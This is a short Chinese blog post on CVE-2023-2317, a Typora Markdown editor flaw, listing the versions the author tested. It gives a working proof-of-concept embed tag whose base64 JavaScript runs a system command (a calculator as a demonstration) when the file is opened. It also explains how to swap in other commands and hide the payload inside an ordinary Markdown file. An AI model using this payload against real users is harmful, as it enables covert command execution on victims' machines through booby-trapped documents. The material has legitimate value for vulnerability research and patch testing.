0x01 说明

漏洞 cve 编号:CVE-2023-2317
这个漏洞是 Typora 产生的
影响版本 1.2.x<1.6.x
测试结果如下:

  • 1.0.x 闪退
  • 1.2.4 卡住
  • 1.3.6 成功
  • 1.4.4 成功
  • 1.5.9 成功
  • 1.6.7 失败
  • 1.7.3 失败

0x02 利用

POC:

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

可以通过修改 base64 这段的内容执行不同的命令

将 poc 粘贴到 md 中保存,可以参入一些数据用于隐藏。

鼠标没有点击或触碰 poc 时是不会显示的。

保存后关闭双击打开成功执行 poc。

0x03演示效果

参考文章:https://mp.weixin.qq.com/s/wVFbXbzvcQfKWScO9p7XgQ

最后修改:2023 年 09 月 05 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏